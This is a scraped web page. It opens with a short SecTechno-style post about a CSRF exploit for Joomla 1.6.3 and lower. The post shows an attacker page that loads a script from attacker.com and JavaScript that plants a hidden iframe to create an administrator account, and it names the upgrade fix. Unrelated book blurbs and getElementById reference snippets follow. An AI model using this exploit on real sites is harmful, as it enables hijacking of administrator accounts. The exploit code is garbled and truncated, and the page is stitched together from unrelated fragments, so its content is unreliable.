CSRF Exploit for Joomla 1.6.3 or Lower | SecTechno
New exploit has been published that target Joomla 1.6.3 or lower version of the vulnerability allows an attacker to create a specially crafted URL that would execute arbitrary script code in the browser of the victim.
Cross-site request (XSRF or CSRF) attack is a web application that uses the relationship of trust between web applications and authenticated users to force users to commit arbitrary sensitive transactions on behalf of an attacker.
Here is the scenario of attack can be the striker following will create a malicious HTML page on a system under its control that can contain a java script joom163.js:
src = http://attacker.com/joom163.js> </ script>
The JavaScript contains the following code:
document.write ('<iframe id = "iframe" src = "http://victim.com/administrator/index.php?com_users option = & view = user & layout = edit "width =" 0 "height =" 0 "style =" visibility: hidden; "onload =" read ()"></ iframe> '); by visiting vulnerable authenticated user to execute without knowing JavaScript to create a server HTTP GET request for funds that will create a root account (username = "Haxx", password = "test123") and although the action sure all cookies associated with this area, the port and the path will be automatically attached to the HTTP header and sent with the application.To correct the flaw that you need to upgrade to Joomla! 1.6.4 or higher.
Getelementbyid Form In Frame - Bookshelf
In Cold Blood
With the publication of this book, Capote permanently ripped through the barrier separating crime reportage from serious literature.In defense of food, an eater's manifesto [additional copies -- 2]
Cites the reasons why people have become so confused about their dietary choices and discusses the importance of enjoyable moderate eating of mostly traditional ...Democracy in America
Among the novel objects that attracted my attention during my stay in the United States, nothing struck me more forcibly than the general equality of ...Reading Lolita in Tehran, A Memoir in Books
Describes growing up in the Islamic Republic of Iran and the group of young women who came together at her home in secret every Thursday to read and discuss ...Democracy in America
A French aristocrat's account of the ways in which democratic ideals were applied in America during the nineteenth century.Day-to-day Information Directory
JavaScript and HTML DOM Reference
Free HTML XHTML CSS JavaScript jQuery XML DOM XSL XSLT RSS AJAX ASP .NET PHP SQL tutorials, references, examples for web building.
HTML DOM Document getElementById() Method
The getElementById() method is supported in all major browsers. ... support inline frames or is currently configured not to display inline frames. ...
Multiple Frames
Change the text in frame 2. top.frame2.document.getElementById('text').innerHTML = "Hello ... Insert Code in Frame 1's T-Box to change the 'select' value to "Telehpone Sanitizer" ...
getElementById
getElementById is the easiest way to reference a specific element of a web page.
<!DOCTYPE xhtml PUBLIC "-//W3C//DTD XHTML 1.0 Transitional ...
... false, white:false */ /** * Includes a Form with javascript * @param {Object} formId ... also get the frame for future use. this.frame = document.getElementById(this.formId) ...
